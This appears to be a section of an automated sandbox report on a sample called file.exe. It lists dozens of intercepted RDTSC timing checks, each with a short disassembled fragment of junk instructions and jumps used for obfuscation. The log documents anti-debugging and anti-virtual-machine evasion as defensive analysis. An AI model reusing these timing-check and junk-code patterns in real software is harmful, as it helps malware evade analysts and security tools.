                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E86 second address: 1350E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135541B second address: 135542A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555A7 second address: 13555AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555AD second address: 13555B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555B3 second address: 13555B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13555B7 second address: 13555FE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007F9EA4BB43C6h 0x00000014 jp 00007F9EA4BB43C6h 0x0000001a jmp 00007F9EA4BB43CAh 0x0000001f popad 0x00000020 push eax 0x00000021 jns 00007F9EA4BB43C6h 0x00000027 jmp 00007F9EA4BB43D3h 0x0000002c pop eax 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 pop eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355777 second address: 135577C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355BBB second address: 1355BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1355BC0 second address: 1355BE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007F9EA509B5E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135A90D second address: 135A913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135AD9F second address: 135ADD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E0h 0x00000008 jno 00007F9EA509B5D6h 0x0000000e jmp 00007F9EA509B5DEh 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F9EA509B5D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135B0CD second address: 135B0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9265 second address: 12F9276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F9EA509B5D8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9276 second address: 12F927C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F927C second address: 12F92BD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, dword ptr [ebp+122D3812h] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F9EA509B5D8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edx, ecx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jne 00007F9EA509B5D6h 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13624BB second address: 13624C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F9EA4BB43C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362B73 second address: 1362B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E0B second address: 1362E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E0F second address: 1362E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1362E13 second address: 1362E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1363398 second address: 13633BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F9EA509B5D6h 0x0000000c popad 0x0000000d je 00007F9EA509B5DAh 0x00000013 popad 0x00000014 jl 00007F9EA509B5F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13633BA second address: 13633C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13633C0 second address: 13633CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0001 second address: 12B0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jng 00007F9EA4BB43C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0012 second address: 12B0016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0016 second address: 12B0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9EA4BB43D5h 0x0000000d jmp 00007F9EA4BB43D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C3E7 second address: 136C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9A1 second address: 136C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9A6 second address: 136C9AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C9AB second address: 136C9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CB39 second address: 136CB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CB3D second address: 136CB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CF58 second address: 136CF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137345B second address: 137345F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137345F second address: 137346E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9EA509B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137346E second address: 1373492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D9h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373492 second address: 1373496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373496 second address: 137349A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137349A second address: 13734A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9EA509B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373760 second address: 1373765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738E6 second address: 13738EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738EE second address: 13738F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738F6 second address: 13738FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738FC second address: 1373912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F9EA4BB43C6h 0x00000010 jno 00007F9EA4BB43C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373912 second address: 137391A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373D8D second address: 1373D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741BA second address: 13741EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9EA509B5E2h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741EA second address: 13741FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F9EA4BB43C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741FA second address: 1374200 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374200 second address: 1374206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374206 second address: 1374223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E8h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D903 second address: 137D927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9EA4BB43C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F9EA4BB43D1h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D927 second address: 137D931 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA509B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D931 second address: 137D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9EA4BB43CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DC4E second address: 137DC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9EA509B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F9EA509B5D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389934 second address: 1389940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9EA4BB43C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389940 second address: 1389944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389944 second address: 1389954 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F9EA4BB43CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E903 second address: 138E90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E90A second address: 138E913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E4E6 second address: 138E4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E4EA second address: 138E504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923A2 second address: 13923EC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9EA509B5E7h 0x0000000f jne 00007F9EA509B5DCh 0x00000015 popad 0x00000016 jl 00007F9EA509B614h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F9EA509B5E2h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923EC second address: 1392406 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9EA4BB43C6h 0x00000008 jbe 00007F9EA4BB43C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F9EA4BB43C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1392406 second address: 139240A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139240A second address: 139240E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139456D second address: 1394573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394573 second address: 139457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13940D5 second address: 13940EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13940EB second address: 1394108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9EA4BB43D3h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394108 second address: 139410C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139425C second address: 1394274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CEh 0x00000007 jo 00007F9EA4BB43C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394274 second address: 139427A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139427A second address: 139427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139427E second address: 1394284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A896E second address: 13A897F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9EA4BB43CCh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A897F second address: 13A89A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9EA509B5D6h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9EA509B5DBh 0x00000014 jng 00007F9EA509B5DEh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A89A7 second address: 13A89AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A89AD second address: 13A89C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C93 second address: 13A8C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A903E second address: 13A9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9044 second address: 13A904A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A904A second address: 13A9061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9EA509B5DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9061 second address: 13A9065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9065 second address: 13A906B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9205 second address: 13A922A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9EA4BB43D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007F9EA4BB43C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A922A second address: 13A924C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9EA509B5E3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A924C second address: 13A9277 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F9EA4BB43EAh 0x00000011 jnp 00007F9EA4BB43D2h 0x00000017 jnl 00007F9EA4BB43C6h 0x0000001d jng 00007F9EA4BB43C6h 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F9EA4BB43C6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DCD second address: 13A9DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4ED4 second address: 13B4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4ED9 second address: 13B4F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E3h 0x00000008 jmp 00007F9EA509B5DDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4F04 second address: 13B4F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4F0B second address: 13B4F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B926B second address: 13B9276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9276 second address: 13B927E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9C50 second address: 13C9C6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9EA4BB43D1h 0x00000008 js 00007F9EA4BB43C6h 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB2C3 second address: 13CB2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB2C7 second address: 13CB2DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB78 second address: 13CDB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB7E second address: 13CDB84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
